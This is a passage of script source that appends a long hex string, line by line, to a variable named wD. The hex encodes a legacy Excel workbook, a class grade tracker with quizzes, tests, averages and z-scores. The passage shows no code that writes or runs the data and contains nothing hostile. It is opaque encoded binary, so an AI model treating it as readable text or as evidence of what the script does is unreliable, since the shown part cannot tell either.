400\"\r\nwD+=\"00000000000000c020e000140000000000f5ff200000f40000000000000000c020e00014000\"\r\nwD+=\"0000000f5ff200000f40000000000000000c020e000140000000000f5ff200000f400000000\"\r\nwD+=\"00000000c020e0001400000000000100200000000000000000000000c020e000140001002b0\"\r\nwD+=\"0f5ff200000f80000000000000000c020e000140001002900f5ff200000f800000000000000\"\r\nwD+=\"00c020e000140001002c00f5ff200000f80000000000000000c020e000140001002a00f5ff2\"\r\nwD+=\"00000f80000000000000000c020e000140007000000f4ff000000f40000000000000000c020\"\r\nwD+=\"e000140006000000f4ff000000f40000000000000000c020e000140001000900f5ff200000f\"\r\nwD+=\"80000000000000000c020e0001400000001000100200000040000000000000000c020e00014\"\r\nwD+=\"000000000001002000006011114020402000040d20e00014000000010001002000006411114\"\r\nwD+=\"020402000040d20e00014000000000001002000006011114020402000040f20e00014000000\"\r\nwD+=\"010001002000006411114020402000040f20e00014000f00000001002000006811114020402\"\r\nwD+=\"000041620e00014000f00010001002000006c11114020402000041620e00014000000000001\"\r\nwD+=\"00200000201111402040200000c020e00014000000000001002000006011114020402000041\"\r\nwD+=\"620e00014001400000001002000006811114020402000040a20e00014000f00000001002000\"\r\nwD+=\"00080000000000000000c0eeee001400130000000100200000080000000000000000c020e00\"\r\nwD+=\"01400000000000000200000e011114020402000040f20e0001400000000000000200000e011\"\r\nwD+=\"114020402000040d20e0001400000000000000200000800000000000000000c020e00014000\"\r\nwD+=\"00001000000200000840000000000000000c020e0001400140001000000200000ec11114020\"\r\nwD+=\"402000040a2093020400108003ff93020400118006ff93020400128004ff93020400138007f\"\r\nwD+=\"f93020400148009ff93020400158008ff93020400008000ff93020400168005ff6001020000\"\r\nwD+=\"0085000b00c710000000000300616c6c85000a003a22000000000200637785000a00893f000\"\r\nwD+=\"000000200687785000c0010580000000004007175697a85000c006764000000000400746573\"\r\nwD+=\"7485000c00ac6f00000000040073746174850011001e80000000000900646576696174696f6\"\r\nwD+=\"e8500110029830000000009006176672067726170688c00040001000100ae01040008000104\"\r\nwD+=\"170020000500000001000100000002000200000003000300000004000400000000000000180\"\r\nwD+=\"01b00210000010b000000010000000000000d3b040001001f000100010018001b0021000001\"\r\nwD+=\"0b000000020000000000000d3b000001001f000100010018001b00210000010b00000003000\"\r\nwD+=\"0000000000d3b010001001f000100010018001b00210000010b000000040000000000000d3b\"\r\nwD+=\"020001001f000100010018001b00210000010b000000050000000000000d3b030001001f000\"\r\nwD+=\"1000100c1010800c1010000548d0100eb0082000f0000f07a000000000006f040000000011c\"\r\nwD+=\"000007000000180000000600000002000000050000000300000004000000040000000300000\"\r\nwD+=\"00500000002000000010000000b000000060000000600000033000bf012000000bf00080008\"\r\nwD+=\"00810141000008c0014000000840001ef1100000000b0000080c00000817000008f7000010f\"\r\nwD+=\"c002f059d010000660000000400005441534b08000043415445474f52590500004752414445\"\r\nwD+=\"160000312f32392c20333020502e203439322c2050203530320d0000382e3620382e3720736\"\r\nwD+=\"86565741f0000312f3330205175697a2032206f6e20726174657320616e6420726174696f73\"\r\nwD+=\"130000312f333120322f312043682054657374204120120000322f312c3220702e203531362\"\r\nwD+=\"02d203531381400006368203720616e642037206e746220636865636b080000686f6d65776f\"\r\nwD+=\"726b090000636c617373776f726b0400007175697a0400007465737418000073696d696c617\"\r\nwD+=\"220747269616e676c6573207061636b65740900006368203820746573740f000070726f6a65\"\r\nwD+=\"6374206f75746c696e650c0000636f6f6c20646f776e20233511000070726f6772657373207\"\r\nwD+=\"3686565742023371000007765656b6c79207265766965772031351000007765656b6c792072\"\r\nwD+=\"6576696577203136110000547269676f6e6f6d657472792054657374140000322f362c20372\"\r\nwD+=\"0702e203739392023312d323520100000702e203533312035333820322f382c39170000392e\"\r\nwD+=\"3320392e34207079746861676f7265616e2074686d1000007765656b6c79207265766965772\"\r\nwD+=\"031340d000054726967205477697374657220130000322f32372c3238204d61746820412074\"\r\nwD+=\"657374150000332f312c3220776b7368742031302e312f31302e361000007765656b6c79207\"\r\nwD+=\"26576696577203137140000547269676f6e6f6d657472792050726f6a6563740c00006c6f63\"\r\nwD+=\"7573207061636b65740b0000436972636c65207175697a1f0000332f372c382031312e31206\"\r\nwD+=\"e6f74657320616e6420707261632041207368740d000050415254494349504154494f4e0d00\"\r\nwD+=\"0070617274696369706174696f6e0900007761726d75702023350d000050617274696369706\"\r\nwD+=\"174696f6e090000436c617373776f726b080000486f6d65776f726b0500005175697a200400\"\r\nwD+=\"00546573740d000046696e616c20617665726167650600006f7574206f66060000677261706\"\r\nwD+=\"820050000477261646508000053747564656e74731900004879706f746865746963616c2063\"\r\nwD+=\"6c617373206772616465730400006d65616e0700006d656469616e200400006d6f646506000\"\r\nwD+=\"06d656469616e08000057656967687465640800004176657261676573080000526567756c61\"\r\nwD+=\"722008000043617465676f72790400005175697a160000496e73657274207175697a2067726\"\r\nwD+=\"170682068657265160000496e73657274207465737420677261706820686572650500005465\"\r\nwD+=\"7374200d00003f20496e73657274206865726504000050757420050000796f7572200300006\"\r\nwD+=\"f662009000063617465676f7279200800006176657261676573050000686572652004000028\"\r\nwD+=\"6e6f74090000776569676874656420080000617665726167652908000063772067726164650\"\r\nwD+=\"a000046696e616c204176672e0400004d65616e08000056617269616e636508000053742e20\"\r\nwD+=\"4465762e0700005a2d53636f72650600004d656469616e03000056617205000053744465760\"\r\nwD+=\"600005a73636f72650300004d656405000074686973200500007061737465040000616c6c20\"\r\nwD+=\"060000677261646573040000686572650500006a757374200700006e756d626572730700006\"\r\nwD+=\"66967757265200400006f757420040000686f7720030000746f20040000736f727406000073\"\r\nwD+=\"742064657608000076617269616e63650700007a2d73636f726505000070616765200500007\"\r\nwD+=\"7696c6c20070000616e7377657220020000612007000070726f6a6563740c00007072657365\"\r\nwD+=\"6e746174696f6e0800007175657374696f6eff006a000800150b00000c000000a50b00009c0\"\r\nwD+=\"000001a0c000011010000bb0c0000b2010000530d00004a020000d00d0000c70200002f0e00\"\r\nwD+=\"00260300007c0e000073030000e70e0000de030000370f00002e0400007d0f000074040000c\"\r\nwD+=\"00f0000b704000001100000f804000063081500630800000000000000000000150000000002\"\r\nwD+=\"0000d20a0000000908100000061000e228cd07c9c00000060200000b0214000000000000000\"\r\nwD+=\"0002000000095110000021c00000d00020001000c00020064000f0002000100110002000000\"\r\nwD+=\"10000800fca9f1d24d62503f5f00020001002a00020000002b0002000000820002000100800\"\r\nwD+=\"008000000000000000000250204000000ff0081000200c10414000000150000008300020000\"\r\nwD+=\"00840002000000a10022000000ff00010001000100040000000000000000000000e03f00000\"\r\nwD+=\"0000000e03f0000120002000100dd00020001006300020001005500020008007d000c000000\"\r\nwD+=\"0000db1f0f00020004007d000c0001000100b60d0f00020004007d000c000300030049030f0\"\r\nwD+=\"0020004007d000c0004000400b60d0f00060004009d000200010000020e0000000000200000\"\r\nwD+=\"0000000900000008021000000000000900ff000000000000010f0008021000010000000900f\"\r\nwD+=\"f000000000000010f0008021000020000000900ff000000000000010f000802100003000000\"\r\nwD+=\"0900ff000000000000010f0008021000040000000900ff000000000000010f0008021000050\"\r\nwD+=\"000000900ff000000000000010f0008021000060000000900ff000000000000010f00080210\"\r\nwD+=\"00070000000900ff000000000000010f0008021000080000000900ff000000000000010f000\"\r\nwD+=\"8021000090000000900ff000000000000010f00080210000a0000000900ff00000000000001\"\r\nwD+=\"0f00080210000b0000000900ff000000000000010f00080210000c0000000900ff000000000\"\r\nwD+=\"000010f00080210000d0000000900ff000000000000010f00080210000e0000000900ff0000\"\r\nwD+=\"00000000010f00080210000f0000000900ff000000000000010f0008021000100000000900f\"\r\nwD+=\"f000000000000010f0008021000110000000900ff000000000000010f000802100012000000\"\r\nwD+=\"0900ff000000000000010f0008021000130000000900ff000000000000010f0008021000140\"\r\nwD+=\"000000900ff000000000000010f0008021000150000000900ff000000000000010f00080210\"\r\nwD+=\"00160000000900ff000000000000010f0008021000170000000900ff000000000000010f000\"\r\nwD+=\"8021000180000000900ff000000000000010f0008021000190000000900ff00000000000001\"\r\nwD+=\"0f00080210001a0000000900ff000000000000010f00080210001b0000000900ff000000000\"\r\nwD+=\"000010f00080210001c0000000900ff000000000000010f00080210001d0000000900ff0000\"\r\nwD+=\"00000000010f00080210001e0000000900ff000000000000010f00080210001f0000000900f\"\r\nwD+=\"f000000000000010f00fd000a00000004001a0033000000fd000a00000005001a0034000000\"\r\nwD+=\"fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a00010002000f0\"\r\nwD+=\"002000000fd000a00010004001a0024000000fd000a00010005001a0025000000fd000a0001\"\r\nwD+=\"0006001a0026000000fd000a00010007001a0027000000fd000a00010008001a0028000000f\"\r\nwD+=\"d000a00020000000f0021000000fd000a00020001000f00220000007e020a00020002000f00\"\r\nwD+=\"000059400600290002000400230000000000000024400000020007ff130024020002c042010\"\r\nwD+=\"5001f9a9999999999b93f05bd001200020005001b00000028401b0000003440060006003800\"\r\nwD+=\"020007001b000000000000002b400000020008ff220024050002c024090002c0240b0002c02\"\r\nwD+=\"41d0002c0420405001f9a9999999999c93f0506003d00020008001b006766666666662c4000\"\r\nwD+=\"00070004ff270024080002c0240a0002c024110002c0241a0002c0241b0002c0420505001f9\"\r\nwD+=\"a9999999999c93f05fd000a00030000000f0003000000fd000a00030001000f00090000007e\"\r\nwD+=\"020a00030002000f0000005940fd000a00040000000f0004000000fd000a00040001000f000\"\r\nwD+=\"a0000007e020a00040002000f0000005940fd000a00050000000f0005000000fd000a000500\"\r\nwD+=\"01000f000b0000007e020a00050002000f0000004940fd000a00060000000f0006000000fd0\"\r\nwD+=\"00a00060001000f00090000007e020a00060002000f0000c05040fd000a00060004001c0029\"\r\nwD+=\"000000fd000a00070000000f0007000000fd000a00070001000f00090000007e020a0007000\"\r\nwD+=\"2000f000000444006003300070004001d00cdcccccccc6c51400000580337fd1d0044020004\"\r\nwD+=\"c044020005c00344020006c00344020007c00344020008c003fd000a00080000000f0008000\"\r\nwD+=\"000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a0009000000\"\r\nwD+=\"0f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a0\"\r\nwD+=\"00a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f00008051\"\r\nwD+=\"40fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000\"\r\nwD+=\"f0000005940fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a00\"\r\nwD+=\"0c0002000f0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a00000\"\r\nwD+=\"07e020a000d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f\"\r\nwD+=\"000a0000007e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000\"\r\nwD+=\"f0001000f000a0000007e020a000f0002000f0000004940fd000a000f000400180035000000\"\r\nwD+=\"fd000a000f000500180036000000fd000a000f000600180034000000fd000a00100000000f0\"\r\nwD+=\"013000000fd000a00100001000f000a0000007e020a00100002000f0000003440fd000a0010\"\r\nwD+=\"000400180024000000fd000a0010000500180025000000fd000a0010000600180026000000f\"\r\nwD+=\"d000a0010000700180037000000fd000a0010000800180028000000fd000a00110000000f00\"\r\nwD+=\"14000000fd000a00110001000f000c0000007e020a00110002000f0000c0524006001f00110\"\r\nwD+=\"00400240000000000000059400000020004ff090024020002c042010500bd00120011000500\"\r\nwD+=\"190000004f40190000005140060006002e001100070019000000000000e050400000110004f\"\r\nwD+=\"f180024050002c024090002c0240b0002c0241d0002c0420405000600330011000800180000\"\r\nwD+=\"00000000c051400000110007fe1d0024080002c0240a0002c024110002c0241a0002c0241b0\"\r\nwD+=\"002c042050500fd000a00120000000f0015000000fd000a00120001000f00090000007e020a\"\r\nwD+=\"00120002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009000\"\r\nwD+=\"0007e020a00130002000f0000000000fd000a00140000000f0017000000fd000a0014000100\"\r\nwD+=\"0f00090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd000a0\"\r\nwD+=\"0150001000f000a0000007e020a00150002000f0000005940fd000a00160000000f00190000\"\r\nwD+=\"00fd000a00160001000f000a0000007e020a00160002000f0000005440fd000a00170000000\"\r\nwD+=\"f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000a00\"\r\nwD+=\"180000000f001b000000fd000a00180001000f00090000007e020a00180002000f000000000\"\r\nwD+=\"0fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a00190002000f\"\r\nwD+=\"0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a001\"\r\nwD+=\"a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000000\"\r\nwD+=\"7e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c0001000f0\"\r\nwD+=\"0090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a001d\"\r\nwD+=\"0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f0020000000f\"\r\nwD+=\"d000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000f00\"\r\nwD+=\"1e000000fd000a001f0001000f000a0000007e020a001f0002000f0000805640d70044000f0\"\r\nwD+=\"a00006c021c007000ea002a002a002a00380061002a002a002a002a002a002a002a00540070\"\r\nwD+=\"00cc002a002a002a002a002a002a002a002a002a002a002a002a002a00c20118000e0007000\"\r\nwD+=\"6000904040000801100110001000907080007feec00aa000f0002f038030000100008f00800\"\r\nwD+=\"0000060000000a1400000f0003f0f80200000f0004f028000000010009f0100000000000000\"\r\nwD+=\"000000000000000000000000002000af00800000000140000050000000f0004f05200000092\"\r\nwD+=\"0c0af00800000001140000000a000043000bf0180000007f0004010401bf0008000800ff010\"\r\nwD+=\"0000800bf0300000200000010f0120000000100010000000100000002000000020000000000\"\r\nwD+=\"11f0000000005d0046001500120014000100012100000000dc089201000000000c001400000\"\r\nwD+=\"0000000000000000001000b000000100000001300ee1f00000b000400010300000200140057\"\r\nwD+=\"0000000000ec0078000f0004f078000000f2030af00800000004140000000a000093000bf03\"\r\nwD+=\"60000008000503236018500010000008b0002000000bf0008000a0047014f05000048012660\"\r\nwD+=\"0000810141000008c001400000087f0300000c00000010f0120000000000000077000200d30\"\r\nwD+=\"0000008030c00f100000011f0000000005d001a00150012001e000400116050323601a80992\"\r\nwD+=\"010000000000000000ec00080000000df000000000b60112001202000000000000000068001\"\r\nwD+=\"000000000003c00690000456e74657220796f7572206e6577207461736b7320686572652e20\"\r\nwD+=\"20596f75206d617920757365207468697320736865657420746f2068656c7020796f752e202\"\r\nwD+=\"04f70656e207468697320646f63756d656e7420616e64206368616e67652074686520696e66\"\r\nwD+=\"6f2e3c001000000000006c0211006800000000000000ec0078000f0004f078000000e2030af\"\r\nwD+=\"00800000005140000000a000093000bf0360000008000a03236018500010000008b00020000\"\r\nwD+=\"00bf0008000a00470155b5ffff480119d5ffff810141000008c001400000087f0300000c000\"\r\nwD+=\"00010f01200000000000600d001040088000800e00008000000000011f0000000005d001a00\"\r\nwD+=\"150012001e0005001160a0323601e40a92010000000000000000ec00080000000df00000000\"\r\nwD+=\"0b60112001202000000000000000029001000000000003c002a0000436c69636b2074686520\"\r\nwD+=\"63656c6c20616e6420636865636b206f75742074686520666f726d756c612e3c00100000000\"\r\nwD+=\"000e90011002900000000000000ec006c000f0004f06c000000c2000af00800000006140000\"\r\nwD+=\"000a000073000bf02a0000008000f03236018500010000008b0002000000bf0008000a00810\"\r\nwD+=\"10d000008bf0110001000c00140000008000010f012000000000004008b001300d3000800b0\"\r\nwD+=\"0120005a00000011f0000000005d001a00150012001e0006001160f0323601d80b920100000\"\r\nwD+=\"00000000000ec00080000000df000000000b6011200120200000000000000003e0010000000\"\r\nwD+=\"00003c003f0000496e7365727420746865206772617068206f6620746869732064617461206\"\r\nwD+=\"f6e2061206e65772073686565742e202053656520646972656374696f6e732e3c0010000000\"\r\nwD+=\"00005d0111003e00000000000000ec00fa000f0004f0f200000002000af0080000000a14000\"\r\nwD+=\"0000a0000b3000bf0b8000000bf000800080042011e01000043013a00000044010400000045\"\r\nwD+=\"c14c00000046c1240000007f0101000100810141000008bf0100001000c00140000008ff011\"\r\nwD+=\"000100013001300f0ff000000000c001a00180034002d003500420036006e000b007c000700\"\r\nwD+=\"8a0003007a001f0080001f0086001f008f0002009e000600ad000a00c6003a00db003a00f00\"\r\nwD+=\"03a0014010e001e0106000f0010000200004000ad012000ad012000ad012000ad012000ad01\"\r\nwD+=\"2000ad012000ac0080000010f012000000000004000b0012005a00080050031500c40000001\"\r\nwD+=\"1f0000000005d001a00150012001e000a00116000000000bc0c92010000000000000000ec00\"\r\nwD+=\"28002f0005f020000000000017f0080000000200000004140000000017f0080000000400000\"\r\nwD+=\"0051400003e021200b606000000004000000000000000000000001d000f0003020004000000\"\r\nwD+=\"0100020002000404ef00060005003700000067081700670800000000000000000000020001f\"\r\nwD+=\"fffffff004000000a0000000908100000061000e228cd07c9c00000060200000b0218000000\"\r\nwD+=\"000001000000290000000c230000cb2f00002f3000000d00020001000c00020064000f00020\"\r\nwD+=\"0010011000200000010000800fca9f1d24d62503f5f00020001002a00020000002b00020000\"\r\nwD+=\"00820002000100800008000000000000000000250204000000ff0081000200c104140000001\"\r\nwD+=\"5000000830002000000840002000000a10022000000ff000100010001000400020001ff0000\"\r\nwD+=\"00000000e03f000000000000e03f0400120002000100dd00020001006300020001005500020\"\r\nwD+=\"008007d000c0000000000b6170f00020004007d000c0001000100920f0f00020004007d000c\"\r\nwD+=\"0008000800db0b0f00060004007d000c000d000d00b60a0f00060004009b0000009d0002000\"\r\nwD+=\"1009e00220000000400060218433601090100000000000000000000000000636c617373776f\"\r\nwD+=\"726b00020e00010000002900000000000e00000008021000010000000a00ff0000000000000\"\r\nwD+=\"10f0008021000020000000a00ff000000000020010f0008021000030000000a00ff00000000\"\r\nwD+=\"0020010f0008021000040000000a00ff000000000000010f0008021000050000000a00ff000\"\r\nwD+=\"000000020010f0008021000060000000a00ff000000000020010f0008021000070000000a00\"\r\nwD+=\"ff000000000020010f0008021000080000000a00ff000000000020010f00080210000900000\"\r\nwD+=\"00a00ff000000000020010f00080210000a0000000a00ff000000000020010f00080210000b\"\r\nwD+=\"0000000a00ff000000000020010f00080210000c0000000a00ff000000000020010f0008021\"\r\nwD+=\"0000d0000000a00ff000000000000010f00080210000e0000000a00ff000000000000010f00\"\r\nwD+=\"080210000f0000000a00ff000000000000010f0008021000100000000800ff0000000000000\"\r\nwD+=\"10f0008021000110000000800ff000000000020010f0008021000120000000800ff00000000\"\r\nwD+=\"0020010f0008021000130000000800ff000000000020010f0008021000140000000800ff000\"\r\nwD+=\"000000020010f0008021000150000000800ff000000000000010f0008021000160000000800\"\r\nwD+=\"ff000000000000010f0008021000170000000800ff000000000020010f00080210001800000\"\r\nwD+=\"00800ff000000000020010f0008021000190000000800ff000000000000010f00080210001a\"\r\nwD+=\"0000000800ff000000000020010f00080210001b0000000800ff000000000020010f0008021\"\r\nwD+=\"0001c0000000800ff000000000020010f00080210001d0000000800ff000000000020010f00\"\r\nwD+=\"080210001e0000000800ff000000000020010f00080210001f0000000800ff0000000000000\"\r\nwD+=\"10f00fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a00010002\"\r\nwD+=\"000f0002000000fd000a00010003000f004b000000fd000a00010004000f0047000000fd000\"\r\nwD+=\"a00010005000f0048000000fd000a00010006000f0049000000fd000a00010007000f004a00\"\r\nwD+=\"0000fd000a00010008000f0029000000fd000a00020000000f0021000000fd000a000200010\"\r\nwD+=\"00f00220000007e020a00020002000f000000594003020e0002000800170014b742712b1451\"\r\nwD+=\"4003020e0002000900170014b742712b145140fd000a00030000000f0003000000fd000a000\"\r\nwD+=\"30001000f00090000007e020a00030002000f0000005940fd000a00030008000f0029000000\"\r\nwD+=\"fd000a00030009000f0029000000fd000a00040000000f0004000000fd000a00040001000f0\"\r\nwD+=\"00a0000007e020a0004000200250000004b40060047000400030025000000000000004b4020\"\r\nwD+=\"001f0007fe310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02\"\r\nwD+=\"4160002c024190002c0241f0002c04209e300060047000400040026009ff4499ff4494c4020\"\r\nwD+=\"00040006ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02\"\r\nwD+=\"4160002c024190002c0241f0002c04209050006004700040005002500f46ae259d16c954020\"\r\nwD+=\"000f0008ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02\"\r\nwD+=\"4160002c024190002c0241f0002c042092e000600470004000600250055db59c2cf83424020\"\r\nwD+=\"00040007ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02\"\r\nwD+=\"4160002c024190002c0241f0002c042090c000600280004000700250047c9462533d2b1bf20\"\r\nwD+=\"00040005ff120044040002c044040004c0041544040006c0067e020a0004000800170000805\"\r\nwD+=\"14001020600040009001700fd000a00050000000f0005000000fd000a00050001000f000b00\"\r\nwD+=\"00007e020a00050002000f0000004940fd000a00060000000f0006000000fd000a000600010\"\r\nwD+=\"00f00090000007e020a00060002000f0000c05040fd000a00070000000f0007000000fd000a\"\r\nwD+=\"00070001000f00090000007e020a00070002000f0000004440fd000a00080000000f0008000\"\r\nwD+=\"000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a0009000000\"\r\nwD+=\"0f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a0\"\r\nwD+=\"00a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f00008051\"\r\nwD+=\"40fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000\"\r\nwD+=\"f0000005940fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a00\"\r\nwD+=\"0c0002000f0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a00000\"\r\nwD+=\"07e020a000d0002000f00000034407e020a000d0004000f0000004f4003020e000d0006000f\"\r\nwD+=\"0043e7357689da4340060028000d0007000f00410b953b80ecf0bf0000040004ff1200440d0\"\r\nwD+=\"002c0440d0004c00415440d0006c006fd000a000e0000000f0010000000fd000a000e000100\"\r\nwD+=\"0f000a0000007e020a000e0002000f00000049407e020a000e0004000f0000004f4003020e0\"\r\nwD+=\"00e0006000f0043e7357689da4340060028000e0007000f00937af3fa6d57d3bf00000d0007\"\r\nwD+=\"ff1200440e0002c0440e0004c00415440e0006c006fd000a000e0008001e0045000000fd000\"\r\nwD+=\"a000e0009001e002a000000fd000a000f0000000f0012000000fd000a000f0001000f000a00\"\r\nwD+=\"00007e020a000f0002000f000198c2407e020a000f0004000f0000004f4003020e000f00060\"\r\nwD+=\"00f0043e7357689da4340060028000f0007000f00f7cfd0457ac1ea3f00000e0007ff120044\"\r\nwD+=\"0f0002c0440f0004c00415440f0006c006060023000f0008001b00cdcccccccccc284000003\"\r\nwD+=\"00637fd0d001fd7a3703d0ad7e33f1e1400057e020a000f0009001f0000003440fd000a0010\"\r\nwD+=\"0000000f0013000000fd000a00100001000f000a0000007e020a00100002000f00000034407\"\r\nwD+=\"e020a00100004000f0000004f4003020e00100006000f0043e7357689da4340060028001000\"\r\nwD+=\"07000f00410b953b80ecf0bf00000f0007ff120044100002c044100004c0041544100006c00\"\r\nwD+=\"6fd000a00110000000f0014000000fd000a00110001000f000c0000007e020a00110002000f\"\r\nwD+=\"0000c05240fd000a00120000000f0015000000fd000a00120001000f00090000007e020a001\"\r\nwD+=\"20002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009000000\"\r\nwD+=\"7e020a00130002000f0000000000fd000a00140000000f0017000000fd000a00140001000f0\"\r\nwD+=\"0090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd000a0015\"\r\nwD+=\"0001000f000a0000007e020a00150002000f00000059407e020a00150004000f0000004f400\"\r\nwD+=\"3020e00150006000f0043e7357689da434006002800150007000f0014820178c39fee3f0000\"\r\nwD+=\"100007ff120044150002c044150004c0041544150006c006fd000a00160000000f001900000\"\r\nwD+=\"0fd000a00160001000f000a0000007e020a00160002000f00000054407e020a00160004000f\"\r\nwD+=\"0000004f4003020e00160006000f0043e7357689da434006002800160007000f00dd376df82\"\r\nwD+=\"403dd3f0000150007ff120044160002c044160004c0041544160006c006fd000a0017000000\"\r\nwD+=\"0f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000a0\"\r\nwD+=\"0180000000f001b000000fd000a00180001000f00090000007e020a00180002000f00000000\"\r\nwD+=\"00fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a00190002000\"\r\nwD+=\"f00000000007e020a00190004000f0000004f4003020e00190006000f0043e7357689da4340\"\r\nwD+=\"06002800190007000f00537e7ab998fbf8bf0000160007ff120044190002c044190004c0041\"\r\nwD+=\"544190006c006fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a\"\r\nwD+=\"001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000\"\r\nwD+=\"0007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000100\"\r\nwD+=\"0f00090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a0\"\r\nwD+=\"01d0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f00200000\"\r\nwD+=\"00fd000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000\"\r\nwD+=\"f001e000000fd000a001f0001000f000a0000007e020a001f0002000f00008056407e020a00\"\r\nwD+=\"1f0004000f0000004f4003020e001f0006000f0043e7357689da4340060028001f0007000f0\"\r\nwD+=\"0010f1cfaaa90e63f0000190007ff1200441f0002c0441f0004c00415441f0006c006d70042\"\r\nwD+=\"00370c000058027e004e0046009a012a002a002a002a002a002a002a002a0076009200ab007\"\r\nwD+=\"6002a002a002a002a00760076002a002a0076002a002a002a002a002a000802100028000d00\"\r\nwD+=\"0e00ff000000000000010f000102060028000d001700d70006001e0000000000c20118001f0\"\r\nwD+=\"00400020009070300010f08000f0005000903080007ffec00aa000f0002f03e020000200008\"\r\nwD+=\"f00800000005000000040400000f0003f00e0200000f0004f028000000010009f0100000000\"\r\nwD+=\"000000000000000000000000000000002000af00800000000040000050000000f0004f05200\"\r\nwD+=\"0000920c0af00800000001040000000a000043000bf0180000007f0004010401bf000800080\"\r\nwD+=\"0ff0100000800bf0300000200000010f0120000000100010000000100000002000000020000\"\r\nwD+=\"00000011f0000000005d00460015001200140001000121000000006c129201000000000c001\"\r\nwD+=\"40000000000000000000000010008000000100000001300ee1f000008000400010300000a00\"\r\nwD+=\"1400570000000000ec0072000f0004f06a000000920c0af00800000002040000000a0000830\"\r\nwD+=\"00bf0300000007f0004010401bf000800080081014e00000883014d000008bf0110001000c0\"\r\nwD+=\"014d000008ff01080008003f0200000200000010f012000000000000004101210000000c00a\"\r\nwD+=\"0023700d300000011f0000000005d001a001500120005000200116000000000381392010000\"\r\nwD+=\"0000000000000908100000062000e228cd07c9c000000602000014000000150000008300020\"\r\nwD+=\"000008400020000004d006a0300004500700073006f006e0020005300740079006c00750073\"\r\nwD+=\"00200043004f004c004f005200200036003000300020004500530043002f005000200032000\"\r\nwD+=\"000000001040005dc008c0243ef800702000100ea0a6f08640001000f006801020001006801\"\r\nwD+=\"020001004c00650074007400650072000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000100000000000000020000000200000001000000300100000000000000000\"\r\nwD+=\"000000000000000000044494e55220000003402580053ab1e3f000000000000000000000000\"\r\nwD+=\"010000000000000000000000000000000800000001000000010000000000020000000400000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"000000000000000000dddd00000000000000000000000000000000000000000000000000000\"\r\nwD+=\"0000000000000000000000580000004f5350454141828202000000000000000100000000000\"\r\nwD+=\"000000000000000000000000000010000000000000004000000000000000000000000000000\"\r\nwD+=\"000000006a0000000000000003000000010000000f000000a10022000100640001000100010\"\r\nwD+=\"0000068016801000000000000e03f000000000000e03f010033000200030060100a00802535\"\r\nwD+=\"16dc000100090060100a008115e60ac80000000a0060100a008115e60ac80001000b0012000\"\r\nwD+=\"2000100011002000000021010000000000000000000d0bfb502e8bf230133100000a0000400\"\r\nwD+=\"0100010064100800000001000000010032100400000002003310000007100c0000000000000\"\r\nwD+=\"0ffff09004d000a101000ffffff0000000000010001004e004d003410000003100c00030001\"\r\nwD+=\"000c000900010000003310000051100f0000020000000007003a0000010002000d100e00000\"\r\nwD+=\"0050147005200410044004500511013000102000000000b003b000002001f00020002005110\"\r\nwD+=\"13000202000000000b003b000002001f000000010051100800030100000000000006100800f\"\r\nwD+=\"fff000000000000331000005f10020000003410000045100200000034100000441004000a00\"\r\nwD+=\"0000241002000200251020000202010000000000eaffffffcbffffff0000000000000000b10\"\r\nwD+=\"04d00103d0000331000004f1014000200020000000000000000000000000000000000261002\"\r\nwD+=\"000a0051100800000100000000000034100000241002000300251020000202010000000000e\"\r\nwD+=\"affffffcbffffff0000000000000000b1004d00103d0000331000004f10140002000200